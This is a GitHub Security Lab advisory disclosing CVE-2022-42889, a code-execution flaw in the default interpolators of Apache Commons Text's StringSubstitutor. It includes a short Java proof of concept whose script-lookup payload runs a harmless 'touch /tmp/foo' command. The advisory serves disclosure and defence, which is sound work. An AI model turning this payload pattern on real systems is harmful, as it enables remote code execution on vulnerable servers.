skip to content
Back to GitHub.com
Home Bounties Research Advisories CodeQL Wall of Fame Get Involved Events
October 17, 2022

GHSL-2022-018: Arbitrary Code Execution in Apache Commons Text - CVE-2022-42889

Alvaro Munoz

Coordinated Disclosure Timeline

Summary

The StringSubstitutor default interpolators may lead to unsafe script evaluation and arbitrary code execution

Product

Apache Commons Text

Tested Version

1.9

Details

Issue: Unsafe script evaluation (GHSL-2022-018)

The StringSubstitutor when used with the default interpolators (StringSubstitutor.createInterpolator()) will perform string lookups that may lead to arbitrary code execution.

In particular, if untrusted data flows into the StringSubstitutor.replace() or StringSubstitutor.replaceIn() methods, an attacker will be able to use the ScriptStringLookup to trigger arbitrary code execution.

final StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
String out = interpolator.replace("${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/foo')}");
System.out.println(out);

Impact

This issue may lead to Remote Code Execution (RCE)

CVE

Resources

Credit

This issue was discovered and reported by GHSL team member @pwntester (Alvaro Muñoz).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-018 in any communication regarding this issue.